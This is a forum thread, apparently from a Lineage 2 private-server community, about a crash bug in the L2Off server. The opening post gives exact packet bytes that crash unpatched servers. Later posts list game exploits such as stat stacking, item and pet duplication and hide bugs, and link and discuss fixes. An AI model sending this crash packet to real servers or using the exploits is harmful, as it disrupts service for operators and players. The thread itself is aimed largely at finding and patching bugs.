Crashing L2Off Server With Requestexenchantskillinfo Packet

[eressea]

Hi,

 

not tested on AdvExt64/Vanganth but crashes unpatched l2off revision 83 (doesn't work with protocol version 148 or higher). It's very simple, you go to NPC where you enchant skills, open skill enchanting and then just send RequestExEnchantSkillInfo packet with invalid enchantType (valid values are 0-3):

 

D0 0E 00 04 00 00 00 01 00 00 00 65 00 00 00

 

D0 : (uint8) ex packet

0E 00 : (uint16) RequestExEnchantSkillInfo

04 00 00 00 : (uint32) enchantType (4)

01 00 00 00 : (uint32) skillId (1)

65 00 00 00 : (uint32) skillLevel (101)

 

If the server is vulnerable, it will crash immediatelly.

 

Fix here: http://www.maxcheaters.com/topic/203385-fix-for-gf83-crash-with-requestexenchantskillinfo/ so be quick :)

Edited June 18, 2016 by eressea

[Rollo]

Hi,

 

not tested on AdvExt64/Vanganth but crashes unpatched l2off revision 83 (doesn't work with protocol version 148 or higher). It's very simple, you go to NPC where you enchant skills, open skill enchanting and then just send RequestExEnchantSkillInfo packet with invalid enchantType (valid values are 0-3):

 

D0 0E 00 04 00 00 00 01 00 00 00 65 00 00 00

 

D0 : (uint8) ex packet

0E 00 : (uint16) RequestExEnchantSkillInfo

04 00 00 00 : (uint32) enchantType (4)

01 00 00 00 : (uint32) skillId (1)

65 00 00 00 : (uint32) skillLevel (101)

 

If the server is vulnerable, it will crash immediatelly.

 

Fix here: http://www.maxcheaters.com/topic/203385-fix-for-gf83-crash-with-requestexenchantskillinfo/ so be quick :)

need to test on vang and advext64 :P

 

Edited June 18, 2016 by Rollo

[eressea]

need to test on vang and advext64 :P

 

 

Let me know, I'm curious :)

[xeL]

kind of too..

[Anarchy]

Nah it won't work on either, was on a list of bugs they had fixed back even before the gf server leaked public

[eressea]

Nah it won't work on either, was on a list of bugs they had fixed back even before the gf server leaked public

 

Does anyone have such list? I desperately need it :))

[Anarchy]

Does anyone have such list? I desperately need it :))

Couldn't find the little private list, was on one of my svn's which is loooooong since deactivated, but I did find a bug report doc from my original GF work so maybe you'll find that useful.

Gracia Final Bugs:
 
 
The Instance Bug:
 
This bug is fairly simple.
Several parties may enter an instance and fight to the end, to reach the boss.
The problem is that if a party logs out, and the rest finish the boss.
The instance penalty is NOT applied to the party who left/logged out.
 
Solution:
When entering instance, create vector with user DB ID's of all members, if instance is succesfull apply penalty to all users.
Maybe after the original function that applies penalty has run it's course.
Instance penalties are character based - see user_inzone for data.
 
 
 
Olympiad Bug:
 
Either 
 
A: Single 1v1 matches (class and classless) are treated as 3v3 matches and points are calced this way.
or
B: Single 1v1 matches (class and classless) are calculated the following way: 1/5 or 1/3 of points trade hands when a looser/winner is found.
 
 
 
 
Augmentation Bug:
 
Any Stat (str/int/men/con/dex/wit) - can be stacked constantly by equip/reequip and then logging out.
Process can be repeated for unlimited up to 99 in stat points.
 
Seems to work only with 1 stat point, if augment item has 2 stat incrementers, latter is chosen to stack.
If item is moved by database or server restarted - the stat stacking goes away.
Must be a bad map/vector stackign on somewhere.
 
 
 
Hide Bug:
 
Supposedly some bug wherein if you in prematch time @ olympiad use the skill "hide".
Your still attackable (maybe with /attackforce) - gonna be a shitter to test.
But yea.

Hide bug is a bit more broad than described though, pets can also continue auto attacking after hide skills are used and a few other things like that.

Another bug I remember off the top of my head also is the last second of cooldown on skills is ignored by the server.

 

have fun :p

Edited June 19, 2016 by Anarchy

[eressea]

Wow, thanks :)

If you find anything more, please let me know :)

[ericvini]

There is also kamaloka timers bug. I dont remember anything else/got any details. "RCE'in" mxc ext should give the fixes to all of them.

[AlmostGood]

few i remember from playing - 1hp bug after rez, safe skill enchant with dropping book on the ground, pet inventory dupe, forever open SOD, there was also some shit item dupe with fishing but dont remember exactly, 3vs3 oly points calculation was bugged, opening any multisell from any npc.

[eressea]

few i remember from playing - 1hp bug after rez, safe skill enchant with dropping book on the ground, pet inventory dupe, forever open SOD, there was also some shit item dupe with fishing but dont remember exactly, 3vs3 oly points calculation was bugged, opening any multisell from any npc.

 

Thanks a lot!

 

1hp bug - is it this one http://boards.lineage2.com/archive/index.php/t-201517.html ?

forever open SOD - can you please remember more details?

[AlmostGood]

1hp bug - is it this one http://boards.lineage2.com/archive/index.php/t-201517.html ?

forever open SOD - can you please remember more details?

1hp - yes exactly,

it was not closing itself after X time, so ppl were farming ECS's for days (sometimes weeks) until GM made restart (dont remember if he was able to close it while running),

problem was blocking Tiat instance.

 

Also funny one - pets were following owner on hide :D

[eressea]

Thanks :) So many things to test and fix :)) But if anyone got more, don't hesitate to write :)

[powercheats]

a few years ago, but now, this packet do not work, i remember do with "INVISIBLE" server crash's all of time. ;p

[eressea]

a few years ago, but now, this packet do not work, i remember do with "INVISIBLE" server crash's all of time. ;p

 

Fortunatelly these crashes are not invisible, they're clearly visible in LinError.txt

It would be worse if you manage to somehow corrupt stack or heap or something...